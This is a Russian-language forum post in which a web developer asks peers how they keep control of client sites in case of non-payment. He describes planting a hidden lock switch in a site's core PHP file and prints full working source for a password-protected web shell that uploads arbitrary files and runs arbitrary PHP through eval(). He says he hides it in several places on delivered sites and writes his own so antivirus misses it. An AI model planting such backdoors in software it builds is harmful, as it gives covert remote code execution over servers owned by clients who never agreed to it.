Хочу тут поднять специфическую тему, надеюсь, меня не обвинят тут же в раскрытии или выманивании профессиональных секретов =)
 
Вот, предположим, существует необходимость тестировать заказанный сайт на конечном сервере (который принадлежит заказчику, или просто заказчик имеет к нему доступ). Так, в общем-то, происходит по разным причинам; самый простой случай - некоторые люди, боясь "кидалова" со стороны исполнителей, обговаривают это непосредственно в договоре, и от этого никак не "отвертеться". Или, например, при работе с мелкими заказами люди отказываются платить, пока не увидят готовый сайт на своем месте.
 
Отдавать сайт заказчику, оставшись только при авансе (если он вообще был), конечно же, не хочется, поэтому в таких случаях приходится предусматривать методы возвращения контроля над сайтом (или хотя бы его ликвидации) на случай, если заказчик платить не захочет.
 
Какие способы защиты используете вы?
Начиная от банальных типа backdoors и шеллов, и заканчивая чем-нибудь интересненьким =)
Ну, может, еще какие-нибудь здравые мысли по поводу того, как обходить такие ситуации вообще и прочее?
В общем, предлагаю устроить обмен опытом. =)
 
Для затравки, вот что обычно делаю я.
 
читать дальше1). Как правило (за исключением самых простых скриптов), каждый php-скрипт проекта прямо или косвенно подключает (require) один файл - ядро движка проекта, причем делается это в самом начале (ядро запускает механизм сессии, определяет нужные заголовки и проч). Соответственно, в этот файл где-то в середине встаивается механизм, с помощью которого его можно заблокировать, заставив выдавать сообщение об ошибке в ответ на любой запрос.
Обычно блокировка выполняется примерно таким запросом (ну, для иллюстрации):
http://www.site.com/?protect=lock&password=cu4ByOBYfPE82s54
При этом, параметр $_GET['protect'] более нигде не используется.
 
2). Простенький скрипт, позволяющий загрузить на сервер произвольный файл и выполнить произвольный PHP-код. Для безопасности я его закрываю HTTP-авторизацией, а затем прячу в нескольких местах на сайте.

<?php

   if ($_SERVER['PHP_AUTH_USER'] != $_SERVER['HTTP_HOST'] or $_SERVER['PHP_AUTH_PW'] != "JtcVkYmaOG6sG8IM")
   {
      header('WWW-Authenticate: Basic realm="' . $_SERVER['HTTP_HOST'] . '"');
      header('HTTP/1.0 401 Unauthorized');
      die;
   }
   
   header("Content-Type: text/html; charset=windows-1251");

?><html>
<body>

   <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" enctype="multipart/form-data">
   
      1. Upload a file (varname MY_FILE):<br>
         <input type="file" name="MY_FILE"><br><br>
         
      2. Execute this php-code:<br>
         <textarea name="php" style="width:0 100%; height:0 250px;"></textarea><br>
         <input type="checkbox" name="strip" value="1" checked> stripslashes()<br><br>
         
      <input type="submit">
   
   </form>
   
<?php

   if ($_POST['php'])
   {
      ?><br><hr><br><?php
      $php = $_POST['php'];
      if ($_POST['strip']) $php = stripslashes($php);
      $result = eval($php);
      ?><br><hr><br>
      Result of execution:<br><br>
      <?php var_dump($result);
   }

?>
</body>
</html>

Кстати, однажды я копировал сайт чужого программера и в течение этого процесса мой NOD32 несколько раз ругался, обнаружив среди файлов сайта "вирус" - а на самом деле это был Shell на php, встроенный первым программером, видимо, с теми же целями. Позже я обнаружил тот же самый скрипт еще на десятке сайтов, которые мне перешли "по наследству", когда программер увольнялся.
Вот с тех пор я не использую какие-то готовые решения (они легко "палятся" тем же антивирусом), а пишу свои защитные скрипты, чтобы убить которых, придется звать другого программера и платить уже ему =)